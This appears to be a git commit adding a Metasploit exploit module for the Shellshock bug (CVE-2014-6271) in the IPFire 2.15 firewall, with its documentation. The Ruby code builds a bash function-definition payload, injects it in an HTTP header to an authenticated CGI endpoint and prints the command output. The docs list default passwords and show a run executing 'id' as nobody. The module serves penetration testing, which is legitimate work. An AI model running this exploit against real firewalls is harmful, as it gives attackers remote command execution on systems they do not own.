first add of ipfire shellshock
parent
13adc3ee0a
commit
df55f9a57c
|
@ -0,0 +1,47 @@
|
|||
The following is the recommended format for module documentation.
|
||||
But feel free to add more content/sections to this.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
|
||||
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format:
|
||||
|
||||
1. Install the firewall
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
|
||||
4. Do: ```set rhost 10.10.10.10```
|
||||
5. Do: ```set CMD ls```
|
||||
6. Do: ```run```
|
||||
7. You should see the output of the command that was run.
|
||||
|
||||
## Options
|
||||
|
||||
**PASSWORD**
|
||||
|
||||
Password is set at install. May be blank, 'admin', or 'ipfire'.
|
||||
|
||||
**CMD**
|
||||
|
||||
This is the command to run on the system.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Example of running the ID command
|
||||
```
|
||||
msf > use exploit/linux/http/ipfire_bashbug_exec
|
||||
msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
|
||||
PASSWORD => admin
|
||||
msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
|
||||
rhost => 192.168.2.202
|
||||
msf exploit(ipfire_bashbug_exec) > set CMD id
|
||||
CMD => id
|
||||
msf exploit(ipfire_bashbug_exec) > exploit
|
||||
|
||||
[+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
|
||||
[*] Exploit completed, but no session was created.
|
||||
```
|
|
@ -0,0 +1,113 @@
|
|||
##
|
||||
## This module requires Metasploit: http://metasploit.com/download
|
||||
## Current source: https://github.com/rapid7/metasploit-framework
|
||||
###
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'IPFire Bash Environment Variable Injection (Shellshock)',
|
||||
'Description' => %q{
|
||||
IPFire, a free linux based open source firewall distribution,
|
||||
version <= 2.15 Update Core 82 contains an authenticated remote
|
||||
command execution vulnerability via shellshock in the request headers.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'h00die <mike@stcyrsecurity.com>', # module
|
||||
'Claudio Viviani' # discovery
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://www.exploit-db.com/exploits/34839/' ],
|
||||
[ 'CVE', 'CVE-2014-6271']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => %w{ linux unix },
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'PAYLOAD' => 'cmd/unix/generic'
|
||||
},
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic'
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Sep 29 2014'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
|
||||
OptString.new('PASSWORD', [ false, 'Password to login with', '']),
|
||||
Opt::RPORT(444)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check()
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/cgi-bin/index.cgi',
|
||||
'method' => 'GET',
|
||||
'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
|
||||
})
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
|
||||
/\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
|
||||
|
||||
if version && update && version == "2.15" && update.to_i < 83
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# CVE-2014-6271
|
||||
#
|
||||
def cve_2014_6271(cmd)
|
||||
%{() { :;}; /bin/bash -c "#{cmd}" }
|
||||
end
|
||||
|
||||
def exploit()
|
||||
begin
|
||||
payload = cve_2014_6271(datastore['CMD'])
|
||||
vprint_status("Exploiting with payload: #{payload}" )
|
||||
res = send_request_cgi({
|
||||
'uri' => '/cgi-bin/index.cgi',
|
||||
'method' => 'GET',
|
||||
'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
|
||||
'headers' => {'VULN' => payload}
|
||||
})
|
||||
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 401
|
||||
/<li>Device: \/dev\/(?<output>.+) reports/m =~ res.body
|
||||
if output
|
||||
print_good(output)
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue